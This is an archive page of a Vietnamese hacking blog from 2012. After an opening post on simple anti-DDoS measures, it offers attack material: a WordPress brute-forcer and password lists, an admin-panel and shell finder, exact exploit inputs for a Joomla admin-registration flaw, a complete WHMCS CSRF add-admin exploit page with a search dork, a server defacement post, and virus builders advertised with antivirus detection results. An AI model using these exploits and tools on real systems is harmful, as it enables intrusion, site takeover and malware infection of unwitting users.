Monday, May 28, 2012

Tấn công DDOS hay còn được gọi tấn công từ chối dịch vụ đơn giản được hiểu là tạo ra 1 lượt truy cập ảo ồ ạt vào một địa chỉ website tại cùng một thời điểm nào đó đã định sẵn nhằm “đánh sập” máy chủ lưu trữ khiến nó chạy chậm hoặc không thể chạy được nữa. Thật sự thì không có phương pháp chống DDOS hiệu quả nhất nhưng nếu với mức độ nhỏ và mang tính không chuyên khi sử dụng các phần mềm được lập trình sẵn ở quy mô nhỏ lẻ thì ta hoàn toàn có thể chủ động phòng chống.

Cách 1: Chống iframe.

Đây  là phương pháp được xem là thô sơ nhất. Kẻ tấn công sẽ mượn 1 website có lượt truy cập lớn nào đó chèn các iframe hướng về website cần đánh rồi cho chạy lệnh refresh (tải lại) nhiều lần hoặc họ viết sẵn 1 tập tin flash với công dụng tương tự rồi đặt lên website và khi người dùng truy cập vào website này thì họ vô tình bất đắc dĩ trở thành người tấn công website kia.

Với hình thức tấn công kiểu như thế này bạn hoàn toàn có thể chống lại bằng cách chèn 1 đoạn mã Javascript chống chèn iframe từ các website khác đến website của bạn.
<script language="JavaScript">
if (top.location != self.location)
{top.location = self.location}
</script>

Bạn có thể tại đoạn mã trên tại: http://www.mediafire.com/?weephu8sgdphwel 

Cách 2: Chống tải lại trang web có ác ý
Một hình thức tấn công khác nữa là dùng phím F5 liên tục có chủ ý, hoặc dùng một phần mềm được lập trình sẵn với công dụng tương tự (tải lại trang web liên tục sau những khoảng thời gian định sẵn) của một nhóm người làm cho trang web của bạn tải lại (reload) liên tục. Việc này có thể làm tốn băng thông của trang web hoặc làm trang web chạy chậm vì những kết nối ảo.

 
Với cách thức tấn công này thì nếu dùng cách một để chống coi như là vô ích. Nếu bạn bị tấn công như thế này thì bạn hãy thiết lập tập tin .htaccess với nội dung:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?domain.com [NC]
RewriteRule !antiddos.phtml http://www.domain.com/antiddos.phtml?%{REQUEST_URI} [QSA]

Sau đó tạo thêm một một tập tin antiddos.phtml có nội dung

<?
$text = $HTTP_SERVER_VARS['QUERY_STRING'];
$text = preg_replace("#php\&#si",'php?',$text);
echo('<center><a href=http://www.domain.com/?'.$text.'><font color=red size=5 face=Monotype>[CLICK HERE TO ENTER]</font></a</center>');
?>
Sau đó bạn upload 2 tập tin này lên thư mục gốc của website. Như vậy là mỗi khi truy cập vào website, nếu lần đầu tiên thì sẽ có thông báo yêu cầu nhấn chuột thì bạn mới vào được website và ở các lần sau sẽ không có và các phần mềm DDOS được lập trình sẽ bị chặn lại ở bước click chuột để vào trang web ở lần truy cập đầu tiên nên việc tải lại trang web chỉ đơn thuần là 1 trang HTML nhỏ không ảnh hưởng nhiều đến hệ thống.

 
Bạn có thể đoạn mã trên tại: http://www.mediafire.com/?c41hmfeod3qxii8

 
Chú ý là cách này chỉ áp dụng cho website đang sử dụng server chạy trên nền Linux.

Cách 3: Giới hạn số kết nối website tại một thời điểm
Khi một khách truy cập vào website thì sẽ tạo ra một truy vấn kết nối với cơ sở dữ liệu (CSDL) lấy thông tin và trả về thông qua hiển thị của website. Mỗi máy chủ sẽ có phép bao nhiêu truy vấn kết nối là hạn định và khi vượt quá hạn mức này thì việc truy cập sẽ khó khăn hoặc không thể truy xuất được. Các tin tặc lợi dụng vào điều này để tạo ra các truy cập ảo, kết nối ảo thông qua proxy hay chuyên nghiệp hơn là mạng botnet nhằm đánh sập trang web và phá hỏng CSDL website. Để hạn chế điều này ta có thể chủ động giới hạn số kết nối truy vấn tin (lượt truy cập) cùng một thời điểm.
Bạn thêm dòng đoạn mã sau vào trang chủ của website.

function server_busy($numer) {
    if (THIS_IS == 'WEBSITE' && PHP_OS == 'Linux' and @file_exists ( '/proc/loadavg' ) and $filestuff = @file_get_contents ( '/proc/loadavg' )) {
        $loadavg = explode ( ' ', $filestuff );
        if (trim ( $loadavg [0] ) > $numer) {
            print '<meta http-equiv="content-type" content="text/html; charset=UTF-8" />';
            print 'Lượng truy cập đang quá tải, mời bạn quay lại sau vài phút.';
            exit ( 0 );
        }
    }
}
$srv = server_busy ( 1000 ); // 1000 là số người truy cập tại 1 thời điểm

Đoạn mã trên có ý nghĩa cho phép 1000 người online trên website tại một thời điểm. Nếu vượt qua số 1000 thì khách truy cập sẽ nhận được thông báo: Lượng truy cập đang quá tải. Mời bạn quay lại sau vài phút.

Bạn có thể tải đoạn mã trên tại: http://www.mediafire.com/?exsl6hpd37eqnk3

Chú ý đoạn mã này chỉ  áp dụng cho ngôn ngữ lập trình PHP.

Đây chỉ là ba cách chống đỡ mang tính chất giản đơn áp dụng cho những đợt tấn công nhỏ lẻ. Để website của mình hoạt động tốt và có sức chống chọi lại những đợt tấn công quy mô lớn bạn nên:

- Tối ưu hóa website ví dụ bạn có thể xây dựng bộ nhớ đệm (cache) cho website để nhằm giảm số kết nối vào CSDL.

- Lựa chọn nhà cung cấp hosting lưu trữ web tốt để có những đối phó với những đợt tấn công.

Anh Kiệt

3 cách phòng chống DDoS hữu hiệu!

By: MIN Software on: 9:09 PM

[Theme Wordpress] Mingle (FULL PSD)

By: MIN Software on: 5:59 PM
DEMO: http://themeforest.net/item/doover-p...review/2279114

Download: http://www.mediafire.com/?04rc5n7qxl15hmo

Pass Unlock: nothing

Theme này hay và SEO tốt lắm nhé! :)

Doover Premium WordPress Theme 2

By: MIN Software on: 5:57 PM
Hello Guys,
Damane WordPress Bruter
Little Tool To brute Force The FamousScript WordPress



Download:
http://www.mediafire.com/?ad5j82q2q70ep2t
./DonE

Damane WordPress Bruter

By: MIN Software on: 5:53 PM
Hi All,
Damane PenTester
A Little Tool Help You To Find Admin Panel And Zip files and shells in sitewebs

Just Put The Traget And Choose One From The 3 Choice
And Click Start


Download:
http://www.mediafire.com/?3zej7t4z8001n77
./DonE

Source: http://www.damane-dz.net/blog/damane-pentester/

Damane PenTester

By: MIN Software on: 5:52 PM

Sunday, May 27, 2012

Share Code + Data làm blog cá nhân đẹp!

By: MIN Software on: 8:40 AM

Saturday, May 26, 2012

Video học lập trình C# từ cơ bản đến nâng cao (Tiếng việt)
Video, Tài liệu lập trình C#

1. Làm quen
:
http://www.mediafire.com/?sharekey=9...87d6e9e958201f

Quote

Bài 1: Tạo và lưu 1 project
Bài 2: Sử dụng slutionexploer
Bài 3: Autohide
Bài 4: Tạo breakpoint
Bài 5:Sử dụng Tool box
Bài 6:Sử dụng propties
Bài 7: dynamichelp
Bài 8: sắp xếp các panel
Bài 9: sử dụng Watch
Bài 10: sử dụng Comment và region
Bài 11: limmediate windown
Bài 12: Layout
Bài 13: Smarttash
Bài 14: Snippet

2. Cơ bản:
http://www.mediafire.com/?sharekey=9...e5f79de27d43e4
Quote

Video 1: Cách xây dựng class trong C#.
Video 2: Biến và các kiểu dữ liệu.
Video 3: Các phép toán và biểu thức.
Video 4: Biểu thức If.
Video 5: Biểu thức Switch.
Video 6: Vòng lặp For.
Video 7: Vòng lặp While và Do ... While.
Video 8: Mảng.
Video 9: Đối số dòng lệnh.
Video 10: Hàm.

3. Nâng cao: http://www.mediafire.com/?sharekey=9...a8a523c67a6e32

Quote

Video 1: Lớp và đối tượng.
Video 2: Thuộc tính và phương thức.
Video 3: Hàm khởi tạo.
Video 4: Tính kế thừa.
Video 5: Điều khiển truy xuất.
Video 6: Không gian tên.
Video 7: Tính đa hình.
Video 8: Lớp trừu tượng và lớp bị khóa.

Ko có password.

Nguồn: http://sinhvienit.net/@forum/threads/13383-video-hoc-lap-trinh-c-tu-co-ban-den-nang-cao-tieng-viet/

Video học lập trình C# từ cơ bản đến nâng cao (Tiếng việt)

By: MIN Software on: 1:19 AM

Monday, May 21, 2012

Download:
http://www.mediafire.com/?z7v0kpcjjx8wh4t
Rất thích hợp cho ai dùng để brute nhé! :D

Share list password for brute force!

By: MIN Software on: 1:02 AM

Sunday, May 20, 2012

Code & Data: Ngoinhateen.info

By: MIN Software on: 7:15 PM

Friday, May 18, 2012

Một lỗi khá mới nhắm vào phần mềm quản trị nội dung (CMS) nổi tiếng - Joomla, được công bố từ tháng 3/2012 trên blog của Jeff Channell [1] nhưng vẫn chưa được nhiều người biết đến.

Kẻ xấu có thể khai thác lỗi bằng cách chèn thêm vào form đăng ký của Joomla trường jform[groups][] với giá trị "7" tương đương với nhóm admin và cố tình đăng nhập lỗi ( ghi sai password hay captcha ). Joomla lúc này sẽ lưu giá trị group này vào phiên làm việc và trong lần đăng ký ngay sau đó kẻ tấn công sẽ đăng ký thành công với quyền hạn cao nhất. Từ đây hắn có thể đăng nhập vào phần quản trị, upload mã độc và leo thang đặc quyền chiếm cả máy chủ.

Lỗi này nằm ở trong tập tin : /components/com_users/models/registration.php dòng số 190 trong phiên bản Joomla 2.5.2

Code:

// Get the groups the user should be added to after registration.
$this->data->groups = isset($this->data->groups) ? array_unique($this->data->groups) : array();


Thật khó hiểu lý do tại sao người thiết kế Joomla muốn để chức năng này.
Phiên bản 2.5.3 đã vá lỗi bằng cách khởi tạo 1 cách bình thường

Code:
$this->data->groups = array();

Exploit PoC được đính kèm bản tin này, viết dưới dạng chrome extension. Đã thử nghiệm trên Joomla 1.7.5 và 2.5.2.

Source Code: https://github.com/danghvu/j0wnla

[1] http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html

Nguồn: http://www.hvaonline.net/hvaonline/posts/list/42223.hva 

* Hướng dẫn khai thác:
Firebug: <input name="jform[groups][]" value="7" />
Tamper Data: jform[groups][]=7

Lỗ hổng bảo mật tạo account quyền admin của Joomla 1.6/1.7/2.5

By: MIN Software on: 7:26 AM

Thursday, May 17, 2012

WHMC CSRF Vulnerability (Add Admin)
============================================
.:. Script : http://www.whmcs.com/
.:. Dork : "Powered by WHMCompleteSolution"
##################################################
===[ Exploit ]===
<html>
<head>
<title>Download</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/AdminPath/configadmins.php?action=addnow">
<input type="hidden" name="roleid" value="1"/>
<input type="hidden" name="firstname" value="Mohammad"/>
<input type="hidden" name="lastname" value="Hussien"/>
<input type="hidden" name="email" value="f.hack@w.cn"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="signature" value="Iam Palestinian"/>
<input type="hidden" name="notes" value="Iam Palestinian"/>
</form>

</body>
</html>

WHMCS 4.4 CSRF Vulnerability (Add Admin)

By: MIN Software on: 2:21 AM

Download all file on video:  
Pass Unzip:
junookyo.blogspot.com
Enjoy!

Deface All Sites on Server Without Root

By: MIN Software on: 1:38 AM

Thursday, May 10, 2012

oclHashcat-plus+v0.08+Released+fastest+password+Cracker


oclHashcat-plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.


Features
  • Free
  • Multi-GPU (up to 16 gpus)
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses highly iterated, modern hashes
  • Focuses single dictionary based attacks
  • Supports pause / resume while cracking
  • Supports reading words from file
  • Supports reading words from stdin
  • Integrated thermal watchdog
  • 20+ Algorithms implemented with performance in mind
  • ... and much more

Algorithms
  • MD5
  • Joomla
  • osCommerce, xt:Commerce
  • SHA1
  • SHA-1(Base64), nsldap, Netscape LDAP SHA
  • SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
  • Oracle 11g
  • SMF > v1.1
  • OSX v10.4, v10.5, v10.6
  • MSSQL(2000)
  • MSSQL(2005)
  • MySQL
  • phpass, MD5(Wordpress), MD5(phpBB3)
  • md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
  • MD4
  • NTLM
  • DCC, mscash
  • SHA256
  • descrypt, DES(Unix), Traditional DES
  • md5apr1, MD5(APR), Apache MD5
  • SHA512
  • OSX v10.7
  • DCC2, mscash2
  • Cisco-PIX MD5
  • WPA/WPA2
  • Double MD5
  • vBulletin < v3.8.5 vBulletin > v3.8.5
  • IPB2+, MyBB1.2+
  • LM
  • Oracle 7-10g

oclHashcat-plus v0.08 Released - fastest password Cracker

By: MIN Software on: 10:02 AM
Batch Virus Maker

Batch Virus Maker 2012 by an05
Hi all users as the title tells the story that this is a batch virus maker that creates the virus of your desire. 

When anyone talks about virus we simply get afraid, isn't it ? your answer may be vary. Let it be, as you might know that in olden days virus is like a hoax, and creating this is like a impossible thing for newbies, but as the security increased the virus's makers are also upgraded theirselves and developed better ways to infect, compromise and crash the system for their own deeds , but now a day's creating a virus isn't a big task and it's no require more technical skills as olden day, because there are many GUI programs are developed out there which helps them to create a virus of their desire within few minutes and by few clicks . 

Today I want to share a "batch virus maker" created by "an05" with you, which is based on batch method and able to hack/crash/prank your slave's system. Below is some screenshots of this program. I think you will no need a tutorial for using this because it's very simple to use, just select the desire tab and choose the option you want and finally click on build button to generate the virus, that's all.

Credit : an05
Download here
Enjoy.......

What People Searched For to Land Here :

Batch Virus Maker
How to Make a Vrius
Free Virus Maker 2012
Automatic Virus Maker
Easy Way to Making Virus
Free Virus Maker Download
How to Make a Vrius For Free 

Batch Virus Maker 2012 by an05

By: MIN Software on: 4:01 AM






Detections

AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -Clean.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Gen:Heur.Bodegun.1.
G Data -Gen:Heur.Bodegun.1 (Engine-A).
IKARUS Security-Clean.
Kaspersky Antivirus -Clean.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
Ad-Aware -Clean.
AhnLab V3 Internet Security -Clean.
Bullguard -virus: Gen:Heur.Bodegun.1.
Imunitet -Gen:Heur.Bodegun.1.
 
Download: Click here to download!

Make a Virus.BAT

By: MIN Software on: 3:46 AM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com